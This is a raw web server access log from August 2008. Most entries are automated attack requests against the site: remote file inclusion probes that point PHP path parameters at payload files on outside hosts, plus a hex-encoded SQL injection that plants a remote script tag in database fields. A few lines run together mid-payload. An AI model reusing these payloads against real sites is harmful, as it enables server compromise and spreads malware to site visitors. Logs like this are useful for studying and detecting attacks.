69.61.106.55 - - [19/Aug/2008:11:56:36 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:56:39 -0700] "GET /logs/access_080606.log/config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:56:39 -0700] "GET /logs/access_080609.log/config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:56:42 -0700] "GET /logs/access_080807.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.22.9 - - [19/Aug/2008:11:56:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.militaria.com/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.22.9 - - [19/Aug/2008:11:56:48 -0700] "GET //skin/zero_vote/error.php?dir=http://www.militaria.com/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.92.242.53 - - [19/Aug/2008:11:57:17 -0700] "GET /logs/access_080201.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432Bemtgibson/us4:63.162.73.74.6.22.125 - - [19/Aug/2008:11:57:19 -0700] "GET /bikes/dteel/10MAR07/ HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
86.92.242.53 - - [19/Aug/2008:11:57:21 -0700] "GET /logs/access_080201.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432attila_kalocsai/us6:87.262.231.161.4 - - [19/Aug/2008:11:57:36 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:57:37 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:58:56 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:58:58 -0700] "GET /index.php?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 9863 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:59:00 -0700] "GET /logs/index.php?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:59:34 -0700] "GET /logs/index.php?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:59:36 -0700] "GET /index.php?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 9863 "-" "libwww-perl/5.64" "www.dmulk.com"
80.70.113.10 - - [19/Aug/2008:11:59:53 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:12:00:55 -0700] "GET /logs/access_080715.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:12:00:55 -0700] "GET /logs/access_080713.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:12:01:43 -0700] "GET /logs/access_080213.log/index.php?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
202.181.210.195 - - [19/Aug/2008:12:02:11 -0700] "GET /logs//?DOCUMENT_ROOT=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 61289 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [19/Aug/2008:12:02:13 -0700] "GET //?DOCUMENT_ROOT=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 9898 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:12:02:40 -0700] "GET /logs/access_080609.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:12:03:00 -0700] "GET /logs/access_080710.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:12:03:11 -0700] "GET /logs/access_080609.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.181.210.195 - - [19/Aug/2008:12:03:11 -0700] "GET /logs/access_080723.log//?DOCUMENT_ROOT=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:12:03:14 -0700] "GET /logs//components/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:12:03:17 -0700] "GET //components/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:12:03:30 -0700] "GET /logs/access_080710.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:12:03:33 -0700] "GET /logs/access_080706.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:12:03:33 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:12:03:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [19/Aug/2008:12:04:03 -0700] "GET /logs/access_080706.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [19/Aug/2008:12:04:03 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [19/Aug/2008:12:04:03 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:12:04:10 -0700] "GET /logs/access_080510.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:12 -0700] "GET /logs/access_080804.log/index2.php?DoAction=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:12 -0700] "GET /index2.php?DoAction=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:13 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:15 -0700] "GET /logs/access_080704.log/index2.php?DoAction=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:17 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:12:04:18 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:31 -0700] "GET /logs/access_080126.log/tarnet/addons/slideshow_full.php?album_name=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:04:31 -0700] "GET /tarnet/addons/slideshow_full.php?album_name=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:04:35 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:04:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.15.135.118 - - [19/Aug/2008:12:04:41 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:04:47 -0700] "GET /logs/access_080217.log/tarnet/addons/slideshow_full.php?album_name=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:12:04:49 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:12:04:49 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:04:51 -0700] "GET /tarnet/addons/slideshow_full.php?album_name=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:07 -0700] "GET /logs/index2.php?DoAction=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:07 -0700] "GET /index2.php?DoAction=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:05:12 -0700] "GET /index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:05:13 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:12:05:36 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:12:05:36 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:12:05:36 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:12:05:36 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:41 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:42 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:05:43 -0700] "GET /logs/access_080804.log/index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:05:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:05:45 -0700] "GET /index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:05:45 -0700] "GET /bikes/dteel/EQ2/ HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:52 -0700] "GET /logs/index2.php?DoAction=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:52 -0700] "GET /index2.php?DoAction=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:54 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:56 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:57 -0700] "GET /logs/access_080219.log/modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:05:57 -0700] "GET /modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:06:06 -0700] "GET /logs/access_080704.log/index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:06:09 -0700] "GET /logs/access_080315.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:06:18 -0700] "GET /logs/access_080706.log/tarnet/addons/slideshow_full.php?album_name=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:06:29 -0700] "GET /logs/access_080324.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:06:30 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:06:30 -0700] "GET /logs/access_080105.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:06:35 -0700] "GET /bikes/dteel/?S=A HTTP/1.0" 200 2878 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.206.113.104 - - [19/Aug/2008:12:06:48 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:06:48 -0700] "GET /bikes/dteel/EQ2/?N=D HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.206.113.104 - - [19/Aug/2008:12:06:48 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:06:53 -0700] "GET /logs/access_080408.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:06:53 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:06:53 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.185.187.12 - - [19/Aug/2008:12:06:54 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://artemcity.ru/allnet2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.185.187.12 - - [19/Aug/2008:12:06:54 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://artemcity.ru/allnet2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.185.187.12 - - [19/Aug/2008:12:06:54 -0700] "GET //include/admin.lib.inc.php?site_path=http://artemcity.ru/allnet2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.185.187.12 - - [19/Aug/2008:12:06:54 -0700] "GET //include/admin.lib.inc.php?site_path=http://artemcity.ru/allnet2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:06:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:06:55 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:12:06:55 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:07:00 -0700] "GET /bikes/dteel/2008_07_20/ HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:07:04 -0700] "GET /logs/access_080412.log/tarnet/addons/slideshow_full.php?album_name=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:07:05 -0700] "GET /logs/access_080408.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:07:05 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:07:06 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:07:07 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:12:07:08 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:07:12 -0700] "GET /bikes/dteel/WeSTOC07/ HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:07:33 -0700] "GET /logs/access_080806.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:07:38 -0700] "GET /bikes/dteel/2008_01_26/ HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:07:39 -0700] "GET /bikes/dteel/2008_02_15/ HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:07:39 -0700] "GET /logs/access_080806.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.75.193.70 - - [19/Aug/2008:12:07:49 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
